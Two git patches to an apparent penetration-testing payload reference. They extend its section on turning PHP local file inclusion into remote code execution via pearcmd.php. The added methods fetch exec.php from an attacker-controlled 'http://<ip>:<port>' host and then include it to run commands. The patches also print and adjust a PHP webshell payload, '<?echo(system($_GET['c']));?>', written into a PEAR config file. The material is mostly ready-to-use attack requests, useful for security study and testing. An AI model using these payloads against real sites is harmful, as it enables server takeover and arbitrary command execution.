From 072cac04d6de1ff1522f9b393f18dcbdf1b16db4 Mon Sep 17 00:00:00 2001
From: Str3am <916525768@qq.com>
Date: Wed, 1 Nov 2023 00:26:27 +0800
Subject: [PATCH 1/2] Add two methods about LFI to RCE via PHP PEARCMD

---
 File Inclusion/README.md | 31 +++++++++++++++++++++++--------
 1 file changed, 23 insertions(+), 8 deletions(-)

diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index 566245d..99bf3e8 100644
--- a/File Inclusion/README.md	
+++ b/File Inclusion/README.md	
@@ -507,7 +507,7 @@ The file `pearcmd.php` uses `$_SERVER['argv']` to get its arguments. The directi
 register_argc_argv = On
 ```
 
-There are two ways to exploit it.
+There are this ways to exploit it.
 
 * Method 1: config create
   ```ps1
@@ -519,13 +519,28 @@ There are two ways to exploit it.
   /vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=<?echo(system($_GET['c']));?>+-s+"
   /vuln.php?file=/tmp/exec.php&c=id
   ```
+  The created configuration file contains the webshell.
+  ```php
+  #PEAR_Config 0.9
+  a:2:{s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}s:7:"man_dir";s:29:"<?echo(system($_GET['c']));?>";}
+  ```
 
-The created configuration file contains the webshell.
-
-```php
-#PEAR_Config 0.9
-a:2:{s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}s:7:"man_dir";s:29:"<?echo(system($_GET['c']));?>";}
-```
+* Method 3: download
+  
+  Need external network connection.
+  ```ps1
+  /vuln.php?file=/usr/local/lib/php/pearcmd.php&+download+http://<ip>:<port>/exec.php
+  /vuln.php?file=exec.php&c=id
+  ```
+* Method 4: install
+  
+  Need external network connection.
+  
+  Notice that `exec.php` locates at `/tmp/pear/download/exec.php`.
+  ```ps1
+  /vuln.php?file=/usr/local/lib/php/pearcmd.php&+install+http://<ip>:<port>/exec.php
+  /vuln.php?file=/tmp/pear/download/exec.php&c=id
+  ```
 
 
 ## LFI to RCE via credentials files
@@ -581,4 +596,4 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
 * [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
 * [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
 * [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
-* [One Line PHP: From Genesis to Ragnarök - Ginoah, Bookgin](https://hackmd.io/@ginoah/phpInclude#/)
\ No newline at end of file
+* [One Line PHP: From Genesis to Ragnarök - Ginoah, Bookgin](https://hackmd.io/@ginoah/phpInclude#/)

From 95a85b455d164cc6db624a6da6233d04fa58cf75 Mon Sep 17 00:00:00 2001
From: Str3am <916525768@qq.com>
Date: Wed, 1 Nov 2023 00:35:59 +0800
Subject: [PATCH 2/2] Add two methods about LFI to RCE via PHP PEARCMD, and
 delete extra double quotes in method 2 payload

---
 File Inclusion/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index 99bf3e8..025f1e8 100644
--- a/File Inclusion/README.md	
+++ b/File Inclusion/README.md	
@@ -516,7 +516,7 @@ There are this ways to exploit it.
   ```
 * Method 2: man_dir
   ```ps1
-  /vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=<?echo(system($_GET['c']));?>+-s+"
+  /vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=<?echo(system($_GET['c']));?>+-s+
   /vuln.php?file=/tmp/exec.php&c=id
   ```
   The created configuration file contains the webshell.